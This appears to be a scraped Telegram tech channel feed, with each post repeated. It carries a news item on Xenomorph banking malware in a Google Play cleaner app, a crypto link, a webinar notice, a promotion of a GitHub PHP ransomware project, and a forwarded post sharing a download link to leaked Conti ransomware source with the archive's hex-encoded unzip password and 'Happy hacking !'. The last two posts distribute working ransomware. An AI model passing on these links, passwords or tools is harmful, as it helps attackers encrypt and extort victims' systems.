Harmful malware detected on Google Play
A dangerous Android virus Xenomorph was found on Google Play, according to the official blog of ThreatFabric security company.
The malware hides in the Fast Cleaner app. It has already managed to infect over 50,000 devices.
Once on the victim's device, Xenomorph tries to get hold of important financial data, gain control over the victim's accounts and carry out unauthorized transactions. The malware's operators then sell all the information gathered to concerned parties.
@geekcode
A dangerous Android virus Xenomorph was found on Google Play, according to the official blog of ThreatFabric security company.
The malware hides in the Fast Cleaner app. It has already managed to infect over 50,000 devices.
Once on the victim's device, Xenomorph tries to get hold of important financial data, gain control over the victim's accounts and carry out unauthorized transactions. The malware's operators then sell all the information gathered to concerned parties.
@geekcode
Ethereum to Reach Trillion Dollar Marketcap This Bull Run
https://www.analyticsinsight.net/ethereum-to-reach-trillion-dollar-marketcap-this-bull-run/
join us ❤️ @geekcode
https://www.analyticsinsight.net/ethereum-to-reach-trillion-dollar-marketcap-this-bull-run/
join us ❤️ @geekcode
#webinar #BigData
Webinar name: Dynamic Talks #85 | Build and execute Snowflake pipelines with Snowpark in Scala
Date April 21
Time 7:00 pm (CEST)
URL - https://fb.me/e/nlI8Ranx5
REGISTER HERE - https://forms.gle/QgQ9JvZyHCobY1789
@geekcode
Webinar name: Dynamic Talks #85 | Build and execute Snowflake pipelines with Snowpark in Scala
Date April 21
Time 7:00 pm (CEST)
URL - https://fb.me/e/nlI8Ranx5
REGISTER HERE - https://forms.gle/QgQ9JvZyHCobY1789
@geekcode
☠ PHP Ransomware ☠
PHP ransomware that encrypts your files, as well as file and directory names.
Ransomware is set to start encrypting files and directories from the server's web root directory and only inside the server's web root directory.
Ransomware will self-destruct upon running, which means you only have one chance at decrypting your data.
Keep also in mind that each decryption file has a uniquely generated salt used in encryption and as such cannot be replaced with another decryption file.
https://github.com/ivan-sincek/php-ransomware
@geekcode
PHP ransomware that encrypts your files, as well as file and directory names.
Ransomware is set to start encrypting files and directories from the server's web root directory and only inside the server's web root directory.
Ransomware will self-destruct upon running, which means you only have one chance at decrypting your data.
Keep also in mind that each decryption file has a uniquely generated salt used in encryption and as such cannot be replaced with another decryption file.
https://github.com/ivan-sincek/php-ransomware
@geekcode
Forwarded from VIrus | Malware | Trojans etc...
Conti Ransomware Source Code Hi everyone. Here are some source codes belonging to the Conti group, with the locker, the decrypter, ...
Link :
https://anonfiles.com/lfV7c2L8xa/conti_locker_v2_zip
The password was bruteforce :
Happy hacking !
Link :
https://anonfiles.com/lfV7c2L8xa/conti_locker_v2_zip
The password was bruteforce :
#unzip -P $(echo $'\x27\x3b\x23\x70\x5d\x65\x28\x64\x3e\x4\xa8\x03\xdc\x47') conti_locker_v2.zip
Happy hacking !